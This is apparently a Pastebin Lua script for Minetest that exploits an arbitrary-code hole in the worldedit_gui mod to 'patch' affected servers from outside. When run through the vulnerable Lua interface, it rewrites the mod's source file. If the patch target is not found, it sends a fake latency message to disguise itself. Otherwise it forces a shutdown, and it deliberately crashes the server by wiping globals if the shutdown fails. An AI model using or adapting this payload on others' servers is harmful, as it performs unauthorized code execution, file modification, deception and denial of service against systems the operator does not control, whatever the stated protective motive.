krock186

Untitled

Jul 15th, 2017
  1. --[[
  2.     worldedit_gui security leak patcher
  3.     Author: Krock/SmallJoker <mk939@ymail.com>
  4.  
  5. A missing line in worledit_gui allows people to execute any Lua code.
  6. This script allows people to fix affected servers using the leak itself.
  7. Check your worlds auth file for players with more privileges than they
  8. should have and keep backing up your stuff ;)
  9.  
  10. For server owners:
  11. 1) Check for mod(-pack) updates (especially worldedit)
  12. 2) Enable the mod security
  13. 3) Update your Minetest server
  14. 4) Goto #1 until all your servers are patched
  15.  
  16. EDIT 170928: Fix crash fallbacks when request_shutdown failed
  17. ]]
  18.  
  19. local SCRIPT_URL = "https://pastebin.com/raw/gMRk9CkR"
  20. local path = minetest.get_modpath("worldedit_gui") .. "/functionality.lua"
  21.  
  22. -- Replacement source code
  23. local t_from =
  24. [[worldedit.register_gui_function("worldedit_gui_lua", {
  25.     name = "Run Lua",
  26.     get_formspec = function(name)]]
  27. -- Replacement destination code
  28. local t_to =
  29. [[minetest.log("warning", "[worldedit_gui] Security leak patched, see ]]
  30. .. SCRIPT_URL .. [[ for further information. Regards.")
  31. worldedit.register_gui_function("worldedit_gui_lua", {
  32.     name = "Run Lua",
  33.     privs = minetest.chatcommands["/lua"].privs,
  34.     get_formspec = function(name)]]
  35.  
  36. -- Code from https://stackoverflow.com/a/1746473
  37. local function escape(str)
  38.     return str:gsub("[%(%)%.%%%+%-%*%?%[%]%^%$]", function(c) return "%" .. c end)
  39. end
  40.  
  41.  
  42. -- The real thing: Find and destroy
  43. local file = io.open(path, "r")
  44. local contents = file:read("*all"):gsub("\r", "")
  45. file:close()
  46.  
  47. local pos = contents:find(t_from, 1, true)
  48. if not pos then
  49.     -- Feedback for the user but make it feel like something natural
  50.     minetest.chat_send_all("Server log: latency=4.12, ping=0.127, t_ratio=4.52")
  51.     return
  52. end
  53.  
  54. minetest.log("warning", "worldedit_gui patcher: Found leak occurence near pos=" .. pos)
  55.  
  56. file = io.open(path, "w")
  57. file:write(contents:gsub(escape(t_from), escape(t_to)))
  58. file:close()
  59.  
  60. minetest.log("warning", "worldedit_gui patcher: Successfully patched!")
  61.  
  62. if minetest.request_shutdown then
  63.     minetest.request_shutdown("Shutting down...", false, 1)
  64.     minetest.request_shutdown()
  65. end
  66.  
  67. minetest.chat_send_all("Server shutting down...")
  68. -- Crash it somehow else, if requested shutdown failed
  69. minetest.after(5, function()
  70.     minetest.registered_globalsteps = nil
  71.     ItemStack = nil
  72. end)